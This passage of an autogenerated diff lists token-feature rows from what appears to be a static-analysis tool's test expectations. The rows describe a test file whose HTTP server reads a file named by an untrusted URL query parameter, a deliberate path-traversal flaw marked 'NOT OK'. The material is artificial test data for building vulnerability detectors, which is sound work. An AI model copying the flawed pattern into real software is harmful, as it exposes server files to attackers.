exceptional return of server.listen() | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:34:1:34:15 | server.listen() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:34:1:34:15 | server.listen() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:34:1:34:15 | server.listen() | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:34:8:34:13 | listen | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:34:8:34:13 | listen | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:34:8:34:13 | listen | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:36:5:36:10 | nodefs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:36:5:36:10 | nodefs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:36:5:36:10 | nodefs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:36:5:36:10 | nodefs | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:36:5:36:31 | nodefs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:36:5:36:31 | nodefs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:36:5:36:31 | nodefs | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:36:5:36:31 | nodefs ... de:fs') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:36:5:36:31 | nodefs ... de:fs') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:36:5:36:31 | nodefs ... de:fs') | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:36:14:36:20 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:36:14:36:20 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:36:14:36:20 | require | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:36:14:36:31 | exceptional return of require('node:fs') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:36:14:36:31 | exceptional return of require('node:fs') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:36:14:36:31 | exceptional return of require('node:fs') | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:36:14:36:31 | require('node:fs') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:36:14:36:31 | require('node:fs') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:36:14:36:31 | require('node:fs') | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:36:22:36:30 | 'node:fs' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/tainted-access-paths.js:36:22:36:30 | 'node:fs' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-access-paths.js:36:22:36:30 | 'node:fs' | calleeImports | | | autogenerated/TaintedPath/tainted-access-paths.js:36:22:36:30 | 'node:fs' | contextFunctionInterfaces | | | autogenerated/TaintedPath/tainted-access-paths.js:36:22:36:30 | 'node:fs' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/tainted-access-paths.js:36:22:36:30 | 'node:fs' | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:38:5:38:11 | server2 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:38:5:38:11 | server2 | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:38:5:38:11 | server2 | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:38:5:41:2 | server2 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:38:5:41:2 | server2 | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:38:5:41:2 | server2 | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:38:5:41:2 | server2 ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:38:5:41:2 | server2 ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:38:5:41:2 | server2 ... T OK\\n}) | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:38:15:38:18 | http | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:38:15:38:18 | http | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:38:15:38:18 | http | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:38:15:38:31 | http.createServer | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:38:15:38:31 | http.createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:38:15:38:31 | http.createServer | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:38:15:41:2 | exceptional return of http.cr ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:38:15:41:2 | exceptional return of http.cr ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:38:15:41:2 | exceptional return of http.cr ... T OK\\n}) | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:38:15:41:2 | http.cr ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:38:15:41:2 | http.cr ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:38:15:41:2 | http.cr ... T OK\\n}) | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:38:20:38:31 | createServer | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:38:20:38:31 | createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:38:20:38:31 | createServer | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:38:33:38:32 | nodefs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:38:33:38:32 | nodefs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:38:33:38:32 | nodefs | enclosingFunctionBody | req res path url parse req url true query path nodefs readFileSync path | +| autogenerated/TaintedPath/tainted-access-paths.js:38:33:38:32 | nodefs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:38:33:38:32 | nodefs | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:38:33:38:32 | this | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:38:33:38:32 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:38:33:38:32 | this | enclosingFunctionBody | req res path url parse req url true query path nodefs readFileSync path | +| autogenerated/TaintedPath/tainted-access-paths.js:38:33:38:32 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:38:33:38:32 | this | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:38:33:38:32 | url | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:38:33:38:32 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:38:33:38:32 | url | enclosingFunctionBody | req res path url parse req url true query path nodefs readFileSync path | +| autogenerated/TaintedPath/tainted-access-paths.js:38:33:38:32 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:38:33:38:32 | url | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:38:33:41:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:38:33:41:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:38:33:41:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path url parse req url true query path nodefs readFileSync path | +| autogenerated/TaintedPath/tainted-access-paths.js:38:33:41:1 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:38:33:41:1 | 'arguments' object of anonymous function | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:38:33:41:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:38:33:41:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:38:33:41:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path nodefs readFileSync path | +| autogenerated/TaintedPath/tainted-access-paths.js:38:33:41:1 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:38:33:41:1 | exceptional return of anonymous function | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:38:33:41:1 | functio ... OT OK\\n} | CalleeFlexibleAccessPath | http.createServer | | autogenerated/TaintedPath/tainted-access-paths.js:38:33:41:1 | functio ... OT OK\\n} | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-access-paths.js:38:33:41:1 | functio ... OT OK\\n} | calleeImports | http | @@ -10591,6 +84026,81 @@ tokenFeatures | autogenerated/TaintedPath/tainted-access-paths.js:38:33:41:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/tainted-access-paths.js:38:33:41:1 | functio ... OT OK\\n} | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:38:33:41:1 | functio ... OT OK\\n} | receiverName | http | +| autogenerated/TaintedPath/tainted-access-paths.js:38:33:41:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:38:33:41:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:38:33:41:1 | return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path nodefs readFileSync path | +| autogenerated/TaintedPath/tainted-access-paths.js:38:33:41:1 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:38:33:41:1 | return of anonymous function | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:38:42:38:44 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:38:42:38:44 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:38:42:38:44 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:38:42:38:44 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:38:42:38:44 | req | enclosingFunctionBody | req res path url parse req url true query path nodefs readFileSync path | +| autogenerated/TaintedPath/tainted-access-paths.js:38:42:38:44 | req | enclosingFunctionBody | req res path url parse req url true query path nodefs readFileSync path | +| autogenerated/TaintedPath/tainted-access-paths.js:38:42:38:44 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:38:42:38:44 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:38:42:38:44 | req | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:38:42:38:44 | req | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:38:47:38:49 | res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:38:47:38:49 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:38:47:38:49 | res | enclosingFunctionBody | req res path url parse req url true query path nodefs readFileSync path | +| autogenerated/TaintedPath/tainted-access-paths.js:38:47:38:49 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:38:47:38:49 | res | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:39:7:39:10 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:39:7:39:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:39:7:39:10 | path | enclosingFunctionBody | req res path url parse req url true query path nodefs readFileSync path | +| autogenerated/TaintedPath/tainted-access-paths.js:39:7:39:10 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:39:7:39:10 | path | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:39:7:39:48 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:39:7:39:48 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:39:7:39:48 | path | enclosingFunctionBody | req res path url parse req url true query path nodefs readFileSync path | +| autogenerated/TaintedPath/tainted-access-paths.js:39:7:39:48 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:39:7:39:48 | path | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:39:7:39:48 | path = ... ry.path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:39:7:39:48 | path = ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:39:7:39:48 | path = ... ry.path | enclosingFunctionBody | req res path url parse req url true query path nodefs readFileSync path | +| autogenerated/TaintedPath/tainted-access-paths.js:39:7:39:48 | path = ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:39:7:39:48 | path = ... ry.path | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:39:14:39:16 | url | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:39:14:39:16 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:39:14:39:16 | url | enclosingFunctionBody | req res path url parse req url true query path nodefs readFileSync path | +| autogenerated/TaintedPath/tainted-access-paths.js:39:14:39:16 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:39:14:39:16 | url | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:39:14:39:22 | url.parse | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:39:14:39:22 | url.parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:39:14:39:22 | url.parse | enclosingFunctionBody | req res path url parse req url true query path nodefs readFileSync path | +| autogenerated/TaintedPath/tainted-access-paths.js:39:14:39:22 | url.parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:39:14:39:22 | url.parse | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:39:14:39:37 | exceptional return of url.par ... , true) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:39:14:39:37 | exceptional return of url.par ... , true) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:39:14:39:37 | exceptional return of url.par ... , true) | enclosingFunctionBody | req res path url parse req url true query path nodefs readFileSync path | +| autogenerated/TaintedPath/tainted-access-paths.js:39:14:39:37 | exceptional return of url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:39:14:39:37 | exceptional return of url.par ... , true) | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:39:14:39:37 | url.par ... , true) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:39:14:39:37 | url.par ... , true) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:39:14:39:37 | url.par ... , true) | enclosingFunctionBody | req res path url parse req url true query path nodefs readFileSync path | +| autogenerated/TaintedPath/tainted-access-paths.js:39:14:39:37 | url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:39:14:39:37 | url.par ... , true) | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:39:14:39:43 | url.par ... ).query | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:39:14:39:43 | url.par ... ).query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:39:14:39:43 | url.par ... ).query | enclosingFunctionBody | req res path url parse req url true query path nodefs readFileSync path | +| autogenerated/TaintedPath/tainted-access-paths.js:39:14:39:43 | url.par ... ).query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:39:14:39:43 | url.par ... ).query | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:39:14:39:48 | url.par ... ry.path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:39:14:39:48 | url.par ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:39:14:39:48 | url.par ... ry.path | enclosingFunctionBody | req res path url parse req url true query path nodefs readFileSync path | +| autogenerated/TaintedPath/tainted-access-paths.js:39:14:39:48 | url.par ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:39:14:39:48 | url.par ... ry.path | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:39:18:39:22 | parse | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:39:18:39:22 | parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:39:18:39:22 | parse | enclosingFunctionBody | req res path url parse req url true query path nodefs readFileSync path | +| autogenerated/TaintedPath/tainted-access-paths.js:39:18:39:22 | parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:39:18:39:22 | parse | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:39:24:39:26 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:39:24:39:26 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:39:24:39:26 | req | enclosingFunctionBody | req res path url parse req url true query path nodefs readFileSync path | +| autogenerated/TaintedPath/tainted-access-paths.js:39:24:39:26 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:39:24:39:26 | req | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:39:24:39:30 | req.url | CalleeFlexibleAccessPath | url.parse | | autogenerated/TaintedPath/tainted-access-paths.js:39:24:39:30 | req.url | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-access-paths.js:39:24:39:30 | req.url | calleeImports | url | @@ -10600,6 +84110,11 @@ tokenFeatures | autogenerated/TaintedPath/tainted-access-paths.js:39:24:39:30 | req.url | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-access-paths.js:39:24:39:30 | req.url | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:39:24:39:30 | req.url | receiverName | url | +| autogenerated/TaintedPath/tainted-access-paths.js:39:28:39:30 | url | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:39:28:39:30 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:39:28:39:30 | url | enclosingFunctionBody | req res path url parse req url true query path nodefs readFileSync path | +| autogenerated/TaintedPath/tainted-access-paths.js:39:28:39:30 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:39:28:39:30 | url | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:39:33:39:36 | true | CalleeFlexibleAccessPath | url.parse | | autogenerated/TaintedPath/tainted-access-paths.js:39:33:39:36 | true | InputArgumentIndex | 1 | | autogenerated/TaintedPath/tainted-access-paths.js:39:33:39:36 | true | calleeImports | url | @@ -10609,6 +84124,41 @@ tokenFeatures | autogenerated/TaintedPath/tainted-access-paths.js:39:33:39:36 | true | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-access-paths.js:39:33:39:36 | true | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:39:33:39:36 | true | receiverName | url | +| autogenerated/TaintedPath/tainted-access-paths.js:39:39:39:43 | query | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:39:39:39:43 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:39:39:39:43 | query | enclosingFunctionBody | req res path url parse req url true query path nodefs readFileSync path | +| autogenerated/TaintedPath/tainted-access-paths.js:39:39:39:43 | query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:39:39:39:43 | query | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:39:45:39:48 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:39:45:39:48 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:39:45:39:48 | path | enclosingFunctionBody | req res path url parse req url true query path nodefs readFileSync path | +| autogenerated/TaintedPath/tainted-access-paths.js:39:45:39:48 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:39:45:39:48 | path | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:40:3:40:8 | nodefs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:40:3:40:8 | nodefs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:40:3:40:8 | nodefs | enclosingFunctionBody | req res path url parse req url true query path nodefs readFileSync path | +| autogenerated/TaintedPath/tainted-access-paths.js:40:3:40:8 | nodefs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:40:3:40:8 | nodefs | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:40:3:40:21 | nodefs.readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:40:3:40:21 | nodefs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:40:3:40:21 | nodefs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path nodefs readFileSync path | +| autogenerated/TaintedPath/tainted-access-paths.js:40:3:40:21 | nodefs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:40:3:40:21 | nodefs.readFileSync | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:40:3:40:27 | exceptional return of nodefs. ... c(path) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:40:3:40:27 | exceptional return of nodefs. ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:40:3:40:27 | exceptional return of nodefs. ... c(path) | enclosingFunctionBody | req res path url parse req url true query path nodefs readFileSync path | +| autogenerated/TaintedPath/tainted-access-paths.js:40:3:40:27 | exceptional return of nodefs. ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:40:3:40:27 | exceptional return of nodefs. ... c(path) | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:40:3:40:27 | nodefs. ... c(path) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:40:3:40:27 | nodefs. ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:40:3:40:27 | nodefs. ... c(path) | enclosingFunctionBody | req res path url parse req url true query path nodefs readFileSync path | +| autogenerated/TaintedPath/tainted-access-paths.js:40:3:40:27 | nodefs. ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:40:3:40:27 | nodefs. ... c(path) | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:40:10:40:21 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:40:10:40:21 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:40:10:40:21 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path nodefs readFileSync path | +| autogenerated/TaintedPath/tainted-access-paths.js:40:10:40:21 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:40:10:40:21 | readFileSync | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:40:23:40:26 | path | CalleeFlexibleAccessPath | nodefs.readFileSync | | autogenerated/TaintedPath/tainted-access-paths.js:40:23:40:26 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-access-paths.js:40:23:40:26 | path | calleeImports | node:fs | @@ -10618,12 +84168,92 @@ tokenFeatures | autogenerated/TaintedPath/tainted-access-paths.js:40:23:40:26 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-access-paths.js:40:23:40:26 | path | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:40:23:40:26 | path | receiverName | nodefs | +| autogenerated/TaintedPath/tainted-access-paths.js:43:1:43:7 | server2 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:43:1:43:7 | server2 | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:43:1:43:7 | server2 | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:43:1:43:14 | server2.listen | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:43:1:43:14 | server2.listen | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:43:1:43:14 | server2.listen | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:43:1:43:16 | exceptional return of server2.listen() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:43:1:43:16 | exceptional return of server2.listen() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:43:1:43:16 | exceptional return of server2.listen() | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:43:1:43:16 | server2.listen() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:43:1:43:16 | server2.listen() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:43:1:43:16 | server2.listen() | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:43:9:43:14 | listen | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:43:9:43:14 | listen | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:43:9:43:14 | listen | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:45:7:45:12 | chownr | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:45:7:45:12 | chownr | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:45:7:45:12 | chownr | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:45:7:45:12 | chownr | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:45:7:45:32 | chownr | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:45:7:45:32 | chownr | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:45:7:45:32 | chownr | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:45:7:45:32 | chownr ... hownr") | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:45:7:45:32 | chownr ... hownr") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:45:7:45:32 | chownr ... hownr") | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:45:16:45:22 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:45:16:45:22 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:45:16:45:22 | require | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:45:16:45:32 | exceptional return of require("chownr") | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:45:16:45:32 | exceptional return of require("chownr") | 